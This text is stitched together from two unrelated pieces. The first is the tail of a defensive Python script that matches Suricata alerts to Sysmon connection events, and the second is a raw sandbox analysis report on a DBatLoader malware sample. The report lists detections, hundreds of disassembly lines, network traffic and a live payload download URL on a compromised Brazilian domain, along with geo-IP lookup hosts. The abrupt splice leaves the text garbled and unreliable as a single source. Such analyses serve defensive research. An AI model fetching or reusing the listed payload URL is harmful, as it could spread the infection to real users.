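    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f").replace(tzinfo=timezone.utc)


def five_tuple(src_ip, src_port, dst_ip, dst_port, proto):
    return (src_ip, int(src_port), dst_ip, int(dst_port), proto.lower())


def index_connections(sysmon_events):
    """Map 5-tuple -> [(time, event)] for outbound Sysmon network connections."""
    idx = {}
    for e in sysmon_events:
        if e.get("EventID") != 3 or not e.get("Initiated"):
            continue
        key = five_tuple(e["SourceIp"], e["SourcePort"], e["DestinationIp"], e["DestinationPort"], e["Protocol"])
        idx.setdefault(key, []).append((parse_sysmon_time(e["UtcTime"]), e))
    return idx


def attribute_alerts(eve_lines, sysmon_events, window=WINDOW):
    """One dict per Suricata alert with the owning process (closest Sysmon connection on the
    same 5-tuple within `window`), or pid/image None when no endpoint event matches."""
    conns = index_connections(sysmon_events)
    results = []
    for line in eve_lines:
        rec = json.loads(line)
        if rec.get("event_type") != "alert":
            continue
        t = parse_eve_time(rec["timestamp"])
        key = five_tuple(rec["src_ip"], rec["src_port"], rec["dest_ip"], rec["dest_port"], rec["proto"])
        candidates = [(abs(ct - t), e) for ct, e in conns.get(key, []) if abs(ct - t) <= window]
        owner = min(candidates, key=lambda c: c[0])[1] if candidates else None
        results.append({
            "sid": rec["alert"]["signature_id"],
            "severity": rec["alert"]["severity"],
            "category": rec["alert"]["category"],
            "dest": f'{rec["dest_ip"]}:{rec["dest_port"]}',
            "pid": owner["ProcessId"] if owner else None,
            "image": owner["Image"] if owner else None,
        })
    return results


if __name__ == "__main__":
    for r in attribute_alerts(EVE_LINES, SYSMON_NET):
        print(r)
```

Keying on the full 5-tuple, not just the source port, is what keeps the later agent.exe connection (same port, different destination) from being blamed for the alert; the time window guards against ephemeral-port reuse on the same tuple across a long capture.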

            AV Detection

Source: INQUIRY LIST 292.vbs | Avira: detected
Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Avira: detection malicious, Label: HEUR/AGEN.1325914
Source: C:\Users\user\AppData\Local\Temp\x.exe | Avira: detection malicious, Label: HEUR/AGEN.1325914
Source: Uhzauuil.PIF.1.dr | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://www.volareconsultoria.com.br/245_Uhzauuilkul"]}
Source: C:\Users\Public\Libraries\Uhzauuil.PIF | ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\x.exe | ReversingLabs: Detection: 42%
Source: C:\Windows \SysWOW64\NETUTILS.dll | ReversingLabs: Detection: 60%
Source: INQUIRY LIST 292.vbs | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows \SysWOW64\NETUTILS.dll | Joe Sandbox ML: detected

            Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org

            Compliance

Source: C:\Users\Public\Libraries\liuuazhU.pif | Unpacked PE file: 6.2.liuuazhU.pif.400000.1.unpack
Source: C:\Users\Public\Libraries\liuuazhU.pif | Unpacked PE file: 11.2.liuuazhU.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\liuuazhU.pif | Unpacked PE file: 17.2.liuuazhU.pif.400000.0.unpack
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49741 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49743 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 50.116.86.44:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000001.00000003.1825875616.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdb source: x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825651514.000000007F650000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr
            Source: Binary string: _.pdb source: liuuazhU.pif, 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, liuuazhU.pif, 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000001.00000003.1848292254.0000000021462000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1848292254.0000000021491000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825651514.000000007F650000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_027D5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, | 1_2_027D5908
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 6_2_1CFCDD90
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2018B807h | 6_2_2018B3E0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2018EBACh | 6_2_2018E810
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2018ABEDh | 6_2_2018A850
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2018E02Ch | 6_2_2018DC90
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2018A05Dh | 6_2_20189CC0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2018D4ACh | 6_2_2018D110
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2018B1B5h | 6_2_2018AE18
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2018E5ECh | 6_2_2018E250
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2018A625h | 6_2_2018A288
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2018DA6Ch | 6_2_2018D6D0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20189A95h | 6_2_201896F8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2018BFDAh | 6_2_2018BF30
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2018BFDAh | 6_2_2018BF2A
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2018CEECh | 6_2_2018CB50
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 6_2_2019E7C0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2019EF95h | 6_2_2019EBF0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1E590h | 6_2_20D1E388
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1F084h | 6_2_20D1E388
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1633Ch | 6_2_20D15FA0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1747Ch | 6_2_20D170E0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1C084h | 6_2_20D1BCE8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D14C3Ch | 6_2_20D148A0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D17FFCh | 6_2_20D17C60
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 6_2_20D1E060
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1CC04h | 6_2_20D1C868
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D157BCh | 6_2_20D15420
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1A3C4h | 6_2_20D1A028
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D15D7Ch | 6_2_20D159E0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1A984h | 6_2_20D1A5E8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1913Ch | 6_2_20D18DA0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D168FCh | 6_2_20D16560
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1B504h | 6_2_20D1B168
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 6_2_20D1D698
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D17A3Ch | 6_2_20D176A0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1C644h | 6_2_20D1C2A8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 6_2_20D1DE60
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D151FCh | 6_2_20D14E60
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D19E04h | 6_2_20D19A68
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D185BCh | 6_2_20D18220
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1D1C4h | 6_2_20D1CE28
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D18B7Ch | 6_2_20D187E0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1AF44h | 6_2_20D1ABA8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D19707h | 6_2_20D19360
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D16EBCh | 6_2_20D16B20
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 20D1BAC4h | 6_2_20D1B728
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov esp, ebp | 6_2_2101240B
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] | 6_2_211703C8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] | 6_2_211703F8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] | 6_2_21170400
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 11_2_2A6BDD90
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 11_2_2D94E7C0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2D94EF95h | 11_2_2D94EBF0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E42B807h | 11_2_2E42B3E0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E42E5ECh | 11_2_2E42E250
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E42B1B5h | 11_2_2E42AE18
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E42DA6Ch | 11_2_2E42D6D0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E429A95h | 11_2_2E4296F8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E42A625h | 11_2_2E42A288
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E42CEECh | 11_2_2E42CB50
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E42BFDAh | 11_2_2E42BF2A
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E42BFDAh | 11_2_2E42BF30
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E42ABEDh | 11_2_2E42A850
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E42EBACh | 11_2_2E42E810
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E42A05Dh | 11_2_2E429CC0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E42E02Ch | 11_2_2E42DC90
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E42D4ACh | 11_2_2E42D110
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4CE590h | 11_2_2E4CE388
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4CF084h | 11_2_2E4CE388
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C57BCh | 11_2_2E4C5420
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C9E04h | 11_2_2E4C9A68
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C51FCh | 11_2_2E4C4E60
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4CD1C4h | 11_2_2E4CCE28
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C85BCh | 11_2_2E4C8220
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 11_2_2E4CD698
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4CC644h | 11_2_2E4CC2A8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C7A3Ch | 11_2_2E4C76A0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C9707h | 11_2_2E4C9360
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4CBAC4h | 11_2_2E4CB728
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C6EBCh | 11_2_2E4C6B20
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C8B7Ch | 11_2_2E4C87E0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4CAF44h | 11_2_2E4CABA8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C633Ch | 11_2_2E4C5FA0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4CCC04h | 11_2_2E4CC868
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C7FFCh | 11_2_2E4C7C60
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4CA3C4h | 11_2_2E4CA028
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4CC084h | 11_2_2E4CBCE8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C747Ch | 11_2_2E4C70E0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C4C3Ch | 11_2_2E4C48A0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4CB504h | 11_2_2E4CB168
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C68FCh | 11_2_2E4C6560
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4CA984h | 11_2_2E4CA5E8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C5D7Ch | 11_2_2E4C59E0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 2E4C913Ch | 11_2_2E4C8DA0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov esp, ebp | 11_2_2E7C2400
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] | 11_2_2E820400
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] | 11_2_2E820388
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] | 11_2_2E8203F8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 17_2_1C3CDD90
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F28B807h | 17_2_1F28B3E0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F28BFDAh | 17_2_1F28BF2B
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F28BFDAh | 17_2_1F28BF30
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F28CEECh | 17_2_1F28CB50
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F28B1B5h | 17_2_1F28AE18
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F28E5ECh | 17_2_1F28E250
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F28A625h | 17_2_1F28A288
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F289A95h | 17_2_1F2896F8
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F28DA6Ch | 17_2_1F28D6D0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F28D4ACh | 17_2_1F28D110
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F28EBACh | 17_2_1F28E810
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F28ABEDh | 17_2_1F28A850
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F28E02Ch | 17_2_1F28DC90
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F28A05Dh | 17_2_1F289CC0
Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 4x nop then jmp 1F29EF95h | 17_2_1F29EBF0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_1F29E7C0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1E590h17_2_1FE1E388
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1F084h17_2_1FE1E388
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE18B7Ch17_2_1FE187E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1633Ch17_2_1FE15FA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1AF44h17_2_1FE1ABA8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE19707h17_2_1FE19360
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE16EBCh17_2_1FE16B20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1BAC4h17_2_1FE1B728
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE17A3Ch17_2_1FE176A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1C644h17_2_1FE1C2A8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE151FCh17_2_1FE14E60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE19E04h17_2_1FE19A68
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE185BCh17_2_1FE18220
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1D1C4h17_2_1FE1CE28
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE15D7Ch17_2_1FE159E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1A984h17_2_1FE1A5E8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1913Ch17_2_1FE18DA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE168FCh17_2_1FE16560
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1B504h17_2_1FE1B168
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1747Ch17_2_1FE170E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1C084h17_2_1FE1BCE8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE14C3Ch17_2_1FE148A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE17FFCh17_2_1FE17C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1CC04h17_2_1FE1C868
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE157BCh17_2_1FE15420
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1A3C4h17_2_1FE1A028
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov esp, ebp17_2_20112400
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov esp, ebp17_2_20112488
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]17_2_202603F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]17_2_202603C8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]17_2_20260400

            Networking

            Source: Malware configuration extractor | URLs: https://www.volareconsultoria.com.br/245_Uhzauuilkul
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_027EE7AC InternetCheckConnectionA, 1_2_027EE7AC
            Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox View | IP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: unknown | DNS query: name: checkip.dyndns.org
            Source: unknown | DNS query: name: reallyfreegeoip.org
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 50.116.86.44:443
            Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.6.168:80
            Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 193.122.6.168:80
            Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 193.122.6.168:80
            Source: global traffic | HTTP traffic detected: GET /245_Uhzauuilkul HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: www.volareconsultoria.com.br
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
            Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.0
            Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49741 version: TLS 1.0
            Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49743 version: TLS 1.0
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: www.volareconsultoria.com.br
            Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
            Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D509000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndn
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
